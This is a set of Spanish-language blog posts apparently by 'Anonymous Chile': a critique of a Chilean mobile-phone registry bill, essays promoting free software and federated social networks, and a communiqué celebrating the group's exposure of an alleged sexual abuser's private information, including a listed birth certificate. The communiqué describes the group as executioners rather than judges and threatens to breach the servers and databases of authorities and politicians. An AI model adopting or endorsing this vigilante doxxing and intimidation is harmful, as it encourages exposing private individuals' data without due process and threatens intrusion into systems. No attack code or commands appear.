En su primera exposición ante la Comisión, el Jefe Nacional de Delitos Económicos y Medio Ambiente hizo tres requerimientos, para su incorporación al proyecto de ley en discusión:

  • Uso de un sistema de autentificación biométrico en línea, proponiendo para ello el uso de las bases de datos del Registro Civil.
  • Un padrón de celulares, mediante el registro de su número IMEI (International Mobile Equipment Identity).
  • Reducir el tiempo dispuesto en el proyecto para su entrada en vigencia, de 2 años a 6 meses.

En cuanto a las dificultades económicas asociadas a propuestas de este tipo, señaló que ello se resolvía mediante el traspaso de sus costos y en cuanto al problema que se suscitaría para la población migrante que no cuenta con documentos de identificación, valoró que ello obligaría a los inmigrantes a acreditar su situación migratoria. De los problemas de proporcionalidad e inconstitucionalidad de este tipo de padrones y tecnologías de vigilancia, ni una sola palabra.

Un acto de fe

El 29 de junio se llevó a cabo una nueva sesión, la que por fin contó con la participación de una voz crítica. Daniel Álvarez Valenzuela, académico de la Facultad de Derecho de la Universidad de Chile, fue el encargado de mostrar la otra cara del proyecto.

El académico e investigador expuso sobre los problemas de ciberseguridad, proporcionalidad e inconstitucionalidad de la medida y sobre la ausencia de un marco normativo adecuado para asegurar que el pretendido registro termine sirviendo a intereses distintos a los tenidos en vista por el legislador en su proyecto. Además, y en caso de que la Comisión quisiera seguir avanzando con el proyecto a pesar de estas advertencias, planteó la necesidad de incorporar un sistema de responsabilidades y fuertes sanciones que prevengan y castiguen el mal uso de este tipo de medidas.

La reacción de las policías no se hizo esperar: criticaron la desconfianza, desmintieron la necesidad de contar con este tipo de sanciones y llamaron a confiar en las instituciones. Pero en un país donde el ejército espía a periodistas por investigar casos de corrupción y las policías realizan montajes burdos y vigilan sindicatos, organizaciones sociales como la Red Chilena Contra la Violencia Hacia la Mujer, e incluso a la Agrupación Nacional de Empleados Públicos (ANEF), lo que piden, más que un acto de confianza, es un acto de fe.

Test de Proporcionalidad

Pero más allá de la confianza que podamos tener o no en nuestras instituciones, el proyecto no cumple con ninguno de los tres criterios del test de proporcionalidad que, conforme estándares internacionales, debiese cumplir cualquier medida susceptible de afectar derechos o garantías fundamentales: idoneidad, necesidad y proporcionalidad.

La medida no es idónea para alcanzar los objetivos propuestos, por cuanto existen otras formas de cometer delitos en el anonimato y la experiencia comparada ha demostrado que iniciativas similares no han logrado disminuir el tipo de delitos que se propone combatir. Tampoco resulta necesaria, según reconoció la misma PDI al señalar, en sesión legislativa del 15 de junio, que existen otros medios para lograr identificar a los delincuentes, pero que la medida en cuestión lo haría “mucho más fácil”. Y en ningún caso resulta proporcional, al implicar el sacrificio del derecho al anonimato de todos los chilenos, con la única finalidad de poder identificar —en el mejor de los casos—a un grupo de personas que representa el 0,05% de la población.

Así, el registro de usuarios de telefonía móvil que se discute en el Congreso tiene serios vicios de constitucionalidad y no cumple con ninguno de los tres criterios del test de proporcionalidad. Por si lo anterior no fuese suficiente, en el último tiempo se han registrado suficientes casos de vigilancia gubernamental como para comprender el peligro que significa una medida de este tipo en un país cuya infraestructura y normativa no entregan siquiera garantías mínimas para su uso restringido, seguro y adecuado.

En síntesis, existen razones de sobra para sostener que un registro como el propuesto no debiese existir y mucho menos incorporar tecnologías que, lejos de protegernos, entrega al Estado capacidades que menoscaban nuestros derechos y vulneran de forma sistemática nuestra privacidad.

[MÁXIMA DIFUSIÓN] Operación Muerte al Patriarcado #OpMuerteAlPatriarcado Anonymous Chile expone información privada de abusador sexual en Coquimbo

Publicada el 04/07/2021 - 11/07/2021 por Anonymous Chile

Saludos, pueblo de Chile y ciudadanos del mundo, nosotros somos Anonymous

Durante los últimos años hemos luchado inalcansablemente contra la violación, la depredación y el abuso de cualquier forma que atente contra la vida, la dignidad, el respeto, el honor y derechos de todo ser vivo. Durante los últimos años hemos presenciado cómo la codicia y la ambición se han apoderado de la sociedad y los pueblos del mundo para así corromper y envenenar las mentes, almas y espíritus de las personas con el único objetivo de ganar algo a cambio, obtener algún tipo de privilegio o alguna clase de acceso absolutamente ilegítimos e injustos bajo cualquier órden social y rigor de lo correcto e incorrecto. El día de hoy nos hacemos oyentes, receptores y expectadores de una trágica y lamentable noticia frente a la cual no podemos hacer otra cosa que actuar.

En medio de nuestras recientes actividades, hemos descubierto una situación que al investigarla nuestra naturaleza humana solamente nos obliga a hablar y hacerla pública. Ésta en disputa se trata nada más y nada menos de una denuncia por violación, depredación y abuso sexual orquestada por un hombre violento y altamente peligroso decidido a amenazar y poner en riesgo la vida de las mujeres inocentes y libres del Planeta Tierra, burlándose y faltando el respeto a la majestuosidad y dignidad del cuerpo humano así como también el inmenso e inconmensurable respeto que se se merece. Este denigrante, deplorable y miserable acto ha sido reportado y denunciado a las autoridades y fuerzas de la ley pertinentes como corresponde, mas éstas víl, cruél y despiadadamente no escuchan, no ven, no actúan ni reaccionan de ninguna manera para llegar al fondo del asunto ni mucho menos ponen ninguna clase de investigación.

En consecuencia de lo mencionado y frente a la situación expuesta, nosotros Anonymous, no como jueces sino más verdugos, hemos decidido tomar cartas en el asunto, y ya que las autoridades y fuerzas de la ley correspondientes una vez más inútiles e incompetentes no hacen, no actúan, no reaccionan, no intentan ni se esfuerzan tan solo por investigar siquiera algo al respecto, nos vemos en la obligación de hacerlo nosotros manejando la situación a nuestra manera y bajo nuestras reglas, lo cual conseguimos de inmediato sin demora alguna. Dentro de la perfecta, exacta y precisa ejecución de nuestro operativo, encontramos rápida y eficazmente al sujeto responsable del susodicho acto, investigando y recopilando toda la información que nos permitió reconstruír la verdad de los hechos y esclarecer así todo lo ocurrido.

Evidentemente como era de esperar, ya que está en conocimiento público de todo el pueblo chileno, una vez más las autoridades, fuerzas de la ley y sistema judicial no hacen más que empeorar las cosas, puesto que no solamente no hacen, no actúan, no reaccionan ni investigan, sino más encima a cambio de una módica cantidad de dinero son capaces de encubrir hasta el más grande criminal de todos los tiempos, todos sus movimientos y actividades sin importar a quien pueda afectar, dañar o lastimar, mientras que intentan perseguir a quienes exponemos la verdad. Por esto así, nosotros nos hacemos presentes para demostrarle a los abusadores y violadores del mundo que no importa cuánto hagan por ocultarse ni quiénes les ayuden, porque tarde o temprano ya sea consciente o inconscientemente se conectarán a Internet y ahí es donde entran en el territorio de la verdad donde las mentiras se exponen y todos los engaños salen a la luz.

Por esto así, nosotros nos hacemos presentes para demostrarle a las autoridades, fuerzas policiales y sistema judicial que no importa cuánto poder y dinero tengan, porque sus servidores están en Internet, sus bases de datos están conectadas a una red informática, sus computadoras y comunicaciones funcionan en base a la tecnología, redes digitales e informáticas, por lo que no importa cuánto hagan por ocultarse, no importa cuánto hagan por esconderse, cuánto dinero inviertan en un sistema de seguridad inseguro basado en una infraestructura vulnerable, porque nosotros siempre estaremos aquí y tarde o temprano cometerán un error que nosotros aprovecharemos como argumento para volverlos a exponer y volverlos a sacar a la luz pública una vez más.

Luego de tantos años luchando por exponer y decir la verdad frente a estos actos tan denigrantes, deplorables y miserables, no queremos que se repitan casos como este, no queremos ni permitiremos que más mujeres inocentes y libres sean víctimas de semejante desgracia tan nefasta y funesta por la cual una vez más no podemos dejarla pasar, no podemos callar, no podemos ignorar porque tal como este sujeto hay millones de otros dispuestos a cometer algo similar o aún mucho peor, con lo que nuestra naturaleza humana nos obliga a hacer exactamente lo que las autoridades, fuerzas de la ley y sistema judicial chileno no hacen, que es actuar, denunciar, demandar, reportar, informar, comunicar, exponer y decir la verdad.

Dicho todo esto así, antes de que la situación empeore, antes de que más mujeres inocentes y libres caigan en las garras de depredadores, violadores y abusadores sexuales como este, antes de que sus víctimas lleguen a ser lastimadas de forma letal solamente por hablar y decir la verdad, Anonymous Chile sale en defensa de los indefensos, de los sin voz, de todos aquellos que no pueden hablar y decir la verdad.

El día de hoy Anonymous Chile se levanta para poner las cartas sobre la mesa y decirle a los políticos y gobernantes de Chile que no existen servidores, computadoras ni redes informáticas que les protejan, porque sea donde sea los encontraremos, siempre estaremos ahí observándoles desde el otro lado de la red.

Vídeo oficial exponiendo toda la información: Operación Muerte al Patriarcado: Anonymous Chile expone información privada de abusador sexual en Coquimbo

Acta de nacimiento del objetivo en cuestión:

Somos legión,
No perdonamos
No olvidamos
Violadores, depredadores y abusadores de Chile y el mundo, no importa donde estén, donde se oculten o cuánto hagan por esconderse, no necesitan esperarnos porque ya estamos aquí y vamos a cazar a todos y cada uno de ustedes, vamos a defender la dignidadad, el respeto y la vida de todas las mujeres inocentes y libres de Chile y el mundo entero.

Autonomía tecnológica: Herramientas libres para la lucha social

Publicada el 28/06/2021 por Anonymous Chile

Cuando por velocidad o facilidad sacrificas privacidad, quizás deberías preguntarte si eres libre o esclavo.

Anonymous Chile.

Si eres fan de Mark Zuckerberg, Bill Gates o Elon Musk, te gusta ganar dinero por encima de todo, no tienes ganas de organizarte con nadie o crees que el neoliberalismo ha hecho más en favor de la humanidad que Violeta Parra, este texto no es para ti.

Si, por el contrario, crees que otros mundos son posibles, y dedicas tiempo y energías para construirlos, y además también usas tecnologías digitales para ello, quizás te puede interesar lo que se dice a continuación.

No pretendemos sentar cátedra o decir lo que hay que hacer. Solamente somos un colectivo de personas con ideas en común o similares que se congregan para debatir y discutir algunos asuntos sobre software libre, autodefensa digital y cómo podemos utilizar internet y los dispositivos interconectados en red para comunicarnos y compartir información de forma segura sin entregar nuestros datos a empresas y gobiernos poco confiables o prudentes con nuestra privacidad. Hemos tenido muchos aprendizajes en estos años, sobre todo partiendo desde la idea de tender puentes entre los movimientos sociales y las herramientas tecnológicas. Un necesario “ida y vuelta” acorde a los tiempos que vivimos.

No creemos en el solucionismo tecnológico. Intentamos mantenernos al margen del tecnooptimismo (propio de la primeras dos décadas de la web) y del tecnocatastrofismo (propio de esta última década). Más bien pensamos que la clave es centrarse en lo social, en las dificultades y las oportunidades de relacionarnos con los procesos sociotécnicos. Tampoco queremos fetichizar lo libre. Por sí mismas las tecnologías no deberían tener el poder que les damos, son herramientas que tendrían que hacer lo que queremos que hagan y dejar de hacer lo que no queremos que hagan.

Sin embargo muchas tecnologías son cerradas, propiedad de grandes corporaciones, a las que necesariamente nos tenemos que adaptar si las queremos usar. Y ya hemos escuchado muchas veces lo que hacen Google, Amazon, Facebook, Apple y Microsoft (el llamado Imperio GAFAM).

La agroindustria y la tecnología

Un amigo hacía una pregunta muy pertinente: ¿tu colectivo u organización se citaría para tener su asamblea en un Starbucks o en un Walmart? ¿Por qué sí la hace en Skype, Zoom, GoogleMeet o FacebookLive?

El modelo agroindustrial cambió nuestro vínculo con la tierra y la alimentación. Como expresan desde las luchas populares, «el problema de la agricultura actual es que no es un sistema orientado a la producción de comida, sino a la producción de dinero». Un puñado de empresas de americanas, europeas y asiáticas deciden qué se produce, cómo se alimenta la población, cómo se manejan y procesan sus datos y, al mismo tiempo, cómo se enferma y empobrece.

Al igual que ocurre con la alimentación y la agroindustria, en las tecnologías digitales existe un control corporativo global. Este Imperio GAFAM, monopolizando, monetizando nuestros datos personales, condicionando políticas, moldeando la cultura popular, está cambiando nuestra forma de relacionarnos, de hacer política, de consumir, de trabajar, de vivir.

Y al igual que la respuesta a los conglomerados del agronegocio son los sistemas alimentarios locales, biodiversos, campesinos y agroecológicos, en el mundo tecnológico se puede luchar contra el capitalismo depredador e individualista buscando y usando alternativas, herramientas libres, abiertas y colaborativas. Es una lucha que ya comenzó hace años, pero que ahora que dependemos tanto de las tecnologías digitales tenemos que extender, porque el problema ya lo estamos viviendo y se va a exacerbar: noticias falsas, vigilancia, control social, vulneración de derechos básicos (libertad de expresión, de asociación y manifestación), pérdida de privacidad y comercialización de datos personales. Un poder que las disponen para producir cambios culturales a gran escala, fomentando el individualismo y la desmovilización, la polarización, la desmemoria y la inmediatez.

Pequeño repaso histórico

Se cumplen ahora 30 años desde la creación de la web, el gran impulso para que Internet se popularizara. Un impulso que pudo materializarse gracias a que era libre. Tim Berners-Lee, su creador, no quiso patentarla y la ofreció así al mundo.

Entonces, en los años 90 se abrió la idea de que Internet nos iba a otorgar libertades hasta entonces solamente soñadas, y se vio en ella la oportunidad de crear un futuro más inclusivo, distribuido y a favor de las personas y sociedades.

Pero ya a finales de la década, los conglomerados corporativos quisieron intervenir e invirtieron en proyectos bajo su lógica de rentabilidad. Poco a poco todo se va cerrando, excluyendo, generando ganancias para unos pocos. Aún así, es hasta 2006 aproximadamente, con las posibilidades que brinda la web 2.0, la creación de las redes sociales comerciales y la adquisición de Youtube por parte de Google cuando las cosas cambian hacia lo que tenemos ahora.

Como indica Osvaldo León, la fuerza de las «plataformas digitales se la encuadra bajo los parámetros ideológicos predominantes pautados por el consumismo, la competitividad, el individualismo como valores de superación y residual convivencia social, bajo un ambiente altamente emotivo». No olvidemos que las tecnologías no son neutrales, sino que responden a los objetivos de quienes las diseñan.

Se pregunta Douglas Rushkoff: ¿Las redes sociales conectan a gente de manera nueva e interesante? No, las redes sociales en realidad usan nuestros datos para predecir nuestro comportamiento futuro para, cuando sea necesario, influir en nuestro comportamiento futuro. Google, Facebook, Amazon o Apple tienen la suficiente capacidad productiva y la influencia directa en las personas como para ser actores políticos decisivos en el actual escenario global.

El proyecto inicial de una red abierta fue derivando en una progresiva centralización y mercantilización.

“Las plataformas digitales han convertido un mercado ya de por sí explotador y extractivo (pensemos en Walmart) en un sucesor aún más deshumanizador (pensemos en Amazon)”, remarca Rushkoff. “Pero el impacto más devastador del capitalismo digital acelerado recae sobre el medioambiente y en la población pobre del mundo”. Y se basan en el extractivismo minero y el extractivismo de datos, añadimos desde Anonymous Chile.

El debate…

En muchas ocasiones es muy difícil dejar de usar las plataformas o herramientas corporativas. En otras se usa el argumento de que “ahí está todo el mundo” y ahí es donde debemos estar con nuestros mensajes. También hay cada vez más voces que dicen que no hay que usar las tecnologías del enemigo, que además tiene el poder de apagar esos mensajes cuando lo deseen.

Recordamos el debate que se ha dado en los movimientos desde los años 80 (o incluso antes): intentar tener repercusión en los medios masivos de comunicación o crear nuestros propios medios. Pensamos que Internet es un territorio en disputa, que es preferible habitar a que sea apropiado por las corporaciones con las consecuencias que implica en la modificación de nuestras ideas y comportamientos. Además, estamos alimentando con nuestra presencia su crecimiento.

Volvemos a Rushkoff, quien afirma que “podemos convertirnos en los consumidores y perfiles individualistas que nuestros dispositivos y plataformas quieren que seamos… o podemos recordar que el ser humano evolucionado de verdad no camina solo”.

Alternativas: camino hacia la autonomía

Desde Anonymous Chile intentamos motivar y alentar el uso de tecnologías libres. Lo libre lo entendemos más como lo colaborativo y abierto, contrario a lo corporativo y cerrado. Sí, libertad para compartir, para el apoyo mutuo, para saber cómo está hecho y para qué sirve. En realidad lo libre da la posibilidad de adaptarlo a nuestras necesidades, ver si hay algo detrás. Y como no todo el mundo desea desentrañar esas herramientas, hay mucha otra gente que testea, comprueba y difunde que las cosas funcionan como dicen que funciona. Cuando es libre, claro.

La Autonomía Tecnológica se puede equipar a la idea de soberanía alimentaria: depende de contar con los medios que hagan posible una tecnología al servicios de las necesidades de comunidades locales.

Es el camino que se puede ir transitando, poco a poco, porque parece que las tecnologías digitales han llegado para quedarse, y para tener una gran importancia en nuestras vidas.

Como en unos de los grandes problemas que ya enfrentamos y que crecerá con el paso del tiempo, «la protección de la privacidad no es un problema individual sino colectivo. La seguridad de nuestra información no es un tema técnico sino político«, coincidimos con estas palabras de Bea Busaniche.

Y quizás no necesitemos perseguir el crecimiento e intentar hacer las cosas “a lo grande”, sino pararnos a pensar qué necesitamos realmente y para qué. O de qué otras formas podemos también diversificar el satisfacer esas necesidades.

Sí es cierto que hasta hace unos años las tecnologías libres eran difíciles de usar, no eran estéticamente atractivas. Pero eso ha cambiado, aunque se haya quedado en el imaginario popular la idea inicial. Muchas de las herramientas abiertas y colaborativas ya las usamos, como el navegador Firefox, el gestor de contenidos WordPress o la paquetería LibreOffice, que incluso superan en prestaciones al software de las corporaciones.

Preferimos algún sistema operativo basado en GNU/Linux, como Arch, Debian, Gentoo o Mint, que son robustos, fáciles de usar, con mucha documentación y personalizables.

Para el tratamiento de imágenes, el diseño gráfico y editorial tenemos Gimp, Scribus e Inkscape. No deberíamos de abandonar los correos electrónicos para comunicarnos, y existen algunos gratuitos y seguros, como los que se ofrecen en RiseUp, Disroot y Framasoft, que además son plataformas militantes que ofrecen otras herramientas útiles.

Para videoconferencias tenemos a Jitsi o Bluebigbuttom; para mensajería instantánea a Signal, por ejemplo. Peertube y FediverseTV son plataformas de videos. Para uso de la “nube” a Nextcloud. Además pueden ir complementadas con el uso de servidores autónomos y cooperativos, como hay en casi todos los países de América Latina. Al igual que nodos a las redes federadas y descentralizadas, como Mastodon o Diáspora.

Es más, cada vez hay más experiencias de redes comunitarias, que se responsabilizan de las infraestructuras básicas, e incluso construyen sus propios routers.

Y existe apoyo tecnológico como Tierra Común, Colectivo Disonancia, LaLibre.net, Cooperativa Primero de Mayo, hacklabs, colectivos tecnológicos y grupos de ciberfeministas para las causas sociales.

Ya no hay excusas para asomarse a las herramientas libres, hay alternativas, soluciones a nuestras necesidades, pero cambiando la mentalidad del solucionismo.

“Hoy más que nunca, debemos esclarecer nuestros horizontes políticos a largo plazo pensando en qué modelo de sociedad queremos vivir y qué estrategias políticas necesitamos para conseguirlo” (Colectivo Disonancia).

Decía recientemente Raúl Zibechi que “aún no hemos encontrado los modos de actuar capaces de enfrentar la revolución digital, no para negarla, sino para evitar que destruya la vida”; quizás, una forma sea no colaborar con este nuevo imperialismo-gafam y dejar de usar sus tecnologías. Salvemos Internet con nuestras decisiones y prácticas cotidianas. Sí se puede, si avanzamos de a poquito con un horizonte definido.

Redes sociales libres, redes nuestras, redes de todxs y para todxs

Publicada el 28/06/2021 - 03/08/2021 por Anonymous Chile

A finales de la década del 2000, cada vez más personas empezaban a cuestionar el rumbo que estaban tomando las redes sociales comerciales que, entonces, estaban construyendo su hegemonía a nivel mundial: principalmente Twitter y Facebook.

Entre los problemas que ya entonces se observaban están la pérdida de privacidad, la concentración de capital, las tendencias monopolísticas y la concentración de las decisiones relativas al funcionamiento mismo de las redes y a sus contenidos -incluyendo la censura-, entendiendo que todo ello deriva en una concentración de poder inaudita y a todas luces inadmisible para quienes defendemos los principios democráticos.

Al calor de estas preocupaciones nacen Diaspora y GNU Social, entre otras. El objetivo era generar redes sociales digitales (RSD) que los usuarios mismos pudieran gestionar, con tres valores como horizonte: libertad, privacidad y descentralización.

Simultánea o posteriormente aparecerían Friendica, Pump.io, Quitter… Otras redes más recientes hacen que este universo federado goce de un aumento significativo en las posibilidades de uso -Hubzilla, verdadera plataforma multiuso; PeerTube, alternativa distribuida a YouTube- o en el número de usuarios -destaquemos el éxito de Mastodon-.

Por sus características estructurales, todas estas plataformas se consideran RSD libres, distribuidas y federadas.

De izquierda a derecha, los modelos de redes centralizado, descentralizado y distribuido (esquema de Paul Baran). Las redes comerciales-privativas suelen inscribirse en el modelo A. Las redes libres responden al B y al C.

¿Por qué libres?

Estas plataformas reposan sobre programas informáticos que cumplen con las cuatro libertades del código libre. Esta característica hace que sea casi imposible que unas manos se hagan con el control de toda la red. De ella se derivan otros rasgos:

  • La red se compone de una multitud de servidores -células conectadas unas con otras, donde se ejecuta el programa de la red y se almacenan los datos de los usuarios-. Los usuarios pueden decidir entre montar su propio servidor o usar el servidor de otro usuario, colectivo, comunidad, agrupación u organización determinada.
  • La comunidad de usuarios puede examinar en todo momento el código de los programas y asegurarse de que no tenga funciones perniciosas.
  • La gestión del código es colaborativa. Muchas manos contribuyen a mejorarlo y a adaptarlo a las necesidades de los usuarios.

¿Qué significa «distribuidas»?

Los usuarios, al montar sus propios servidores, constituyen una malla de nodos que se comportan como iguales, en un esquema horizontal, sin jerarquía, abierto y orgánico (modelo C de la ilustración de más arriba).

En este esquema, los servidores o nodos son autogestionados e independientes. Pueden decidir cómo funcionar, cómo financiarse, cómo manejar los datos que contienen, qué políticas seguir sobre los contenidos, etcétera.

De la misma forma, los usuarios podemos movernos de un servidor a otro -igual que cambiamos de cuenta de correo electrónico- si las condiciones de un servidor concreto no nos satisfacen. Las ganancias en libertad y diversidad son evidentes.

¿Federadas?

Las redes libres tienden a federarse unas con otras. Al compartir protocolos estándar, o «hablar lenguajes comunes», los usuarios de Diaspora pueden comunicarse con los de Hubzilla o Friendica; y estos, con los de Mastodon o GNU Social. De esta forma, se construyen espacios de comunicación abiertos y cada vez más amplios.

Así, se desactiva la coacción emocional que sufrimos en las redes comerciales-privativas «cerradas» -las que deciden no ser compatibles, no comunicarse con sus iguales-, esa coacción que nos lleva a unirnos a una red y a no salir de ella por miedo a vernos aislados.

Otras ventajas

Frente a las redes comerciales-privativas, hay muchas otras ventajas en las redes libres. Podríamos destacar las siguientes:

  • No tienen enfoque comercial, no comercian con nuestros datos. Nuestra relación con ellas no es mercantil -no somos el producto ni el consumidor- sino de cooperación voluntaria.
  • No introducen publicidad.
  • No nos incitan constantemente a usarlas, por lo que son más sanas, menos adictivas.
  • Permiten el anonimato.
  • Permiten tomar decisiones de forma colectiva.
  • No usan algoritmos que deciden qué contenidos vemos y cómo.

¿Qué implica esto en la práctica?

Contar con redes autogestionadas de forma distribuida es una ganancia para la democracia de internet y para la soberanía en el ámbito de la comunicación social. Además, podría ser el último recurso que tengamos para contrarrestar los crecientes monopolios y bajar al nivel de los usuarios el poder que acumulan las empresas que poseen las redes comerciales-privativas.

Los individuos y organizaciones que desean disfrutar de las ventajas que aportan las RSD, pero prefieren hacerlo en un marco ético, están transitando hacia las redes libres. Ahí encuentran un espacio de interacción con gente de todo el mundo y rico en contenidos. Puede resultar más interesante -aunque no necesario- transitar acompañados de otras personas de nuestro entorno socioafectivo (familiares, amigos, compañeros de trabajo…).

A quienes usan las RSD para difundir contenidos propios se les puede hacer más difícil renunciar a las golosas cifras de personas que les sigan en los espacios cerrados de las redes privativas. Hay organizaciones que drásticamente migran hacia redes exclusivamente libres. Otras prefieren mantener un pie en cada mundo mientras facilitan la transición de su público. En tal proceso, ayudará comunicar debidamente cuál es la posición de la organización al respecto y cómo se pueden seguir sus contenidos en redes libres.

En cualquier caso, conviene tener en mente que no somos simples usuarios, receptores pasivos, sino actores, con una cuota de poder relativa. Nuestras decisiones y gestos cotidianos modelan las decisiones y gestos de quienes nos rodean. Decía Kevin Kelly -fundador de la revista Wired- que «los seres humanos somos los órganos sexuales de la tecnología». En nuestras manos está, pues, reproducir uno u otro modelo.

Redes sociales digitales: un gran negocio

Publicada el 28/06/2021 por Anonymous Chile

A medida que el uso de las redes sociales digitales (RSD) va representando un espacio creciente en el escenario comunicacional, desde lo mediático hasta lo publicitario, pasando por lo interpersonal, resulta cada vez más complejo apreciar su alcance e impacto en cómo nos informamos, de qué fuentes, de qué maneras nos comunicamos y compartimos contenidos, y con quiénes.

Uno de los elementos centrales que incide en cómo se dan estos cambios es el modelo corporativo privado dominante en las plataformas digitales. Ese modelo de desarrollo de Internet y las tecnologías digitales no era el único posible. Por un lado, hubo grandes inversiones públicas para desarrollar la tecnología, que luego se entregó al sector privado para su usufructo. Por otro, las interfaces de intercambio en línea nacieron mucho antes de las plataformas de redes sociales y fueron parte de Internet desde sus inicios, por lo general en espacios creados y autogestionados por los usuarios/as, como, por ejemplo, las listas electrónicas temáticas, los murales (“bulletin boards”), los grupos de noticias (newsgroups), o las bases de datos de acceso abierto.

La entrada en escena, hacia inicios de este siglo, de la llamada Web 2.0 –cuyo discurso promocional habla de “descentralización radical, confianza radical, participación… experiencia de usuario, control de la información de cada uno…”– coincide con las grandes inversiones de capitales en las nuevas empresas tecnológicas de Silicon Valley y –luego del estallido de la burbuja bursátil de los “punto.com”– la necesidad de buscar formas de rentabilizarlas, lo que no parecía tan fácil en un ámbito donde los contenidos se comparten libremente.

Con las redes sociales digitales, que habían comenzado a aparecer en la última década del siglo pasado, las empresas encuentran una solución: crear plataformas donde las personas se interconecten, compartan contenidos y generen datos, a partir de los cuales crean perfiles de cada usuario que, a su vez, se venden a anunciantes. La lógica que se impone implica que, a mayor uso de la plataforma, más usuarios acuden, más datos se acumulan, más ventas se generan. Por lo mismo, se crean espacios cercados para que los usuarios no salgan de la plataforma sino que realicen la mayor parte de sus actividades en línea dentro de la misma. Por ello, en muchas redes sociales empresariales, solo se puede intercambiar con quienes tienen una cuenta en la misma red, hecho que va en contra del espíritu con que nació Internet, como protocolo que permite intercomunicar entre todas las plataformas.

Estas prácticas se prestan a la conformación de “monopolios naturales” debido al “efecto red”: es decir, los usuarios optan de preferencia por las redes digitales más concurridas, donde están sus amistades, clientes, temas de interés. Estas hoy se llaman YouTube, Facebook, Twitter, Instagram… cuyo poder es tal que van eliminando o absorbiendo la competencia.

La trampa de los algoritmos

Desde la lógica de la rentabilidad, lo que los usuarios hacen en la plataforma importa poco, con que la sigan alimentando con sus datos, generando tráfico y consumiendo publicidad. De hecho, son los propios usuarios que dan sentido, contenido y orientación a los usos predominantes de cada plataforma.

Con el pretexto de mejorar la experiencia para sus usuarios, las empresas desarrollan algoritmos (o sea, conjuntos de instrucciones o reglas computacionales que permiten llevar a cabo una serie de operaciones) cuyas funciones incluyen determinar lo que será visible –o no– para cada usuario, supuestamente en función de sus intereses identificados, pero muchas veces incorporando otros criterios orientados a vender más publicidad o incluso a motivar niveles de adicción al uso constante de la red y comportamientos compulsivos.

Se ha constatado, por ejemplo, que las emociones negativas conllevan a tendencias de acción en línea más fuertes que las emociones positivas; por lo tanto, ciertos algoritmos terminan priorizando aquellos contenidos que provocan reacciones de ira u odio en el usuario. También, cuando un usuario muestra interés en contenidos con posiciones político-sociales extremistas, el algoritmo le ofrece nuevos contenidos aún más extremos. Con ello, estos sistemas contribuyen a radicalizar posturas y a agudizar antagonismos existentes en la sociedad, al punto que, en contextos de fuerte conflictividad, han llegado a catalizar acciones colectivas (offline) de violencia física e incluso casos de linchamiento. Como consecuencia, se estrecha el espacio para el debate político y la confrontación de ideas, programas, tesis y la búsqueda de consensos mínimos entre puntos de visto divergentes que son fundamentales para la convivencia democrática.

A ello se añade el constante acoso al usuario para que no se desconecte, que siga consumiendo contenidos y alimentando su perfil. Snapchat, por ejemplo, una de las redes preferidas por la juventud, donde las fotos duran un tiempo limitado, incita al usuario a estar permanentemente conectado: que no se vaya a perder algo que los panas han posteado o han visto. Tiene incluso un sistema de puntaje que penaliza a quien se desconecta. Así se tiende a generar niveles de adicción y dependencia.

Poco conscientes del poder de estos algoritmos, por lo general usamos acríticamente las plataformas de RSD, confiando en empresas que no rinden cuentas ante nadie, dejando que influyan, con algoritmos opacos, en las relaciones que formamos, en la información que consumimos, en las audiencias a las que llegamos, en quien conoce sobre nuestra vida privada, e incluso en por quien votamos.

¿Se agota el actual modelo de RSD?

Los recientes escándalos sobre la proliferación de noticias falsas, la falta de ética y transparencia, el abuso de datos personales y la injerencia en procesos electorales han comenzado, sin embargo, a socavar esta confianza.

Los escándalos cada vez más frecuentes en torno a los abusos de ciertas plataformas, particularmente explotando datos personales, han sido uno de los catalizadores que han terminado generando una reacción negativa. El público usuario comienza a sentirse utilizado, ve vulnerada su privacidad, se da cuenta que no controla qué contenidos puede ver ni quiénes ven los contenidos que coloca, o se siente hastiado con la publicidad. Como resultado, cada vez más usuarios deciden cerrar sus cuentas en ciertas RSD o migran a otra plataforma que parece ofrecer mejores garantías. Facebook ha sido una de las redes más afectadas por tales escándalos.

Un estudio reciente registra por primera vez un descenso en el número de usuarios en algunas RSD (Twitter y Snapchat), en el segundo trimestre de este año, y crecimiento casi estático en otras (como Facebook, que perdió, además, un millón de usuarios en Europa). Ello evidencia, tal vez, lo efímero que puede ser una plataforma u otra, más no el sistema en sí, pues son las mismas empresas transnacionales que están creando las plataformas alternativas a las que migran la mayoría de usuarios. La juventud, en particular, está migrando de preferencia a plataformas gráficas como Instagram (Facebook) o Youtube (Google); y muchos usuarios prefieren usar plataformas de mensajería con encriptación para compartir información, como Whatsapp (Facebook).

Ahora bien, en el caso, por ejemplo, de sistemas de mensajería como Whatsapp, ha costado a las empresas encontrar un modelo que permita monetizar su uso de la misma manera que las RSD, ya que responden a otras lógicas. De hecho Facebook ha anunciado hace poco que a partir de 2019, introducirá publicidad en Whatsapp; ello podría comprometer la privacidad de las comunicaciones, ya que se ha revelado que la empresa planea extraer palabras clave de los mensajes (supuestamente cifrados) para orientar la publicidad. Queda por ver cuantos usuarios terminen migrando de Whatsapp a algún otro sistema de mensajería. Vale destacar, también, que con respecto al uso de las redes sociales en la política, la migración a mensajería implica que no se puede evaluar públicamente el uso ni impacto de estos sistemas para difundir noticias falsas o mensajes de odio, ya que son mensajes privados.

Entonces, en el fondo se plantea la pregunta de si la solución pasa por mudar cada vez de plataforma comercial para esquivar los inconvenientes, o si es más bien el actual modelo comercial en sí que plantea un serio problema, no solo en términos individuales, sino para la sociedad y la democracia misma.

En este contexto, las redes sociales libres presentan una alternativa interesante (ver el artículo de Miguel Guardado en la edición 536 de América Latina en Movimiento), especialmente para proteger las interacciones privadas y dinámicas internas de organizaciones o comunidades, donde es clave mantener el control y garantizar privacidad; pero también, cada vez más, se están convirtiendo en espacios de difusión pública alternativa.

Un espacio de disputa política

En todo caso, en la realidad actual, quienes actúan en los ámbitos mediático, político, social o cultural difícilmente pueden hacer caso omiso de las RSD comerciales más concurridas. Nos guste o no, ya ocupan un lugar cada vez más central en la vida pública y como tal constituyen un espacio de disputa para interactuar con públicos amplios.

De hecho, numerosos actores sociales, sectores organizados, medios alternativos o artistas han convertido a las RSD comerciales en espacios que potencian la organización y la resistencia. Al apropiarse de estos canales de difusión e intercambio, han podido convocar movilizaciones con un alcance mucho mayor que con métodos anteriores, compartir creatividad, opiniones y versiones de la realidad excluidas de los medios hegemónicos, amplificarlas mediante procesos virales, o generar nuevas expresiones culturales. La tecnopolítica y la tecnocultura ya son parte de la nueva realidad, particularmente entre la juventud, y desbordan los parámetros fijados por los dueños de las plataformas, generando formas organizativas y comunicacionales novedosas, que fluyen entre el mundo online y offline.

